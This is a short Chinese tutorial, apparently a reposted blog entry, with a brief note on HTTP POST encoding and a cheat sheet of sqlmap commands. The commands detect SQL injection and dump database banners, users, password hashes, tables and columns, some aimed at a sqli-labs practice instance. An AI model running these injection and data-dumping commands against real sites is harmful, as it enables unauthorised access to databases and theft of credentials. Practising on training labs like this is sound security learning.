HTTP协议规定post提交的数据必须放在消息主体（entity-body）中，但协议没有规定数据必须使用什么编码方式。HTTP协议是以ASCII码传输，建立再TCP/IP协议之上的应用层规范。HTTP请求分为3个部分：状态行、请求头和消息主体。类似于：

服务端通常是根据请求头（header）中的Content_Type字段来获取请求中的消息主体是用何种方式编码，再对消息主体进行解析。

sqlmap常规操作

GET形式

Python sqlmap.py -u “http://–URL地址–/index.PHP?id=1” //注入判断-u:URL地址参数
python sqlmap.py -u “http://192.168.0.141/sqli-labs/Less-1/index.PHP?id=1” --banner //查看数据库版本

Python sqlmap.py -u “http://–URL地址–/index.PHP?id=1” --current-user //当前用户

Python sqlmap.py -u “http://–URL地址–/index.PHP?id=1” --password //查询数据库用户密码

Python sqlmap.py -u “http://–URL地址–/index.PHP?id=1” --dbs //查看所有的数据库

Python sqlmap.py -u “http://–URL地址–/index.PHP?id=1” --current-db //查看当前的数据库

Python sqlmap.py -u “http://–URL地址–/index.PHP?id=1” --tables //查看所有的表

Python sqlmap.py -u “http://–URL地址–/index.PHP?id=1” --tables -D A //查看A库下的所有表

Python sqlmap.py -u “http://–URL地址–/index.PHP?id=1” --columns -D A -T B //查询A库B表下的所有列

Python sqlmap.py -u “http://–URL地址–/index.PHP?id=1” -C “E,F” -D A -T B //导出字段里的内容

——POST形式——

Python sqlmap.py -u “http://–url–/” --data “uname=123&passwd=123&submit=Submit” //指定页面的POST注入

Python sqlmap.py -r “绝对路径\文件名” --level 3

python sqlmap.py -u “http://192.168.0.141/sqli-labs/Less-20/index.PHP” --cookie=“uname=admin” --level 2 //检测指定cookie字段进行注入
Python sqlmap.py -r “绝对路径\文件名.txt”–level 2 //检测文件内cookie字段进行注入

python sqlmap.py -u “http://192.168.0.141/sqli-labs/Less-20/index.PHP” --cookie=“uname=admin” --dbs --level 2

python sqlmap.py -u “http://192.168.0.141/sqli-labs/Less-1/index.PHP?id=1” --hostname //查看主机名

版权声明：本文内容由互联网用户自发贡献，该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容， 请发送邮件至 dio@foxmail.com 举报，一经查实，本站将立刻删除。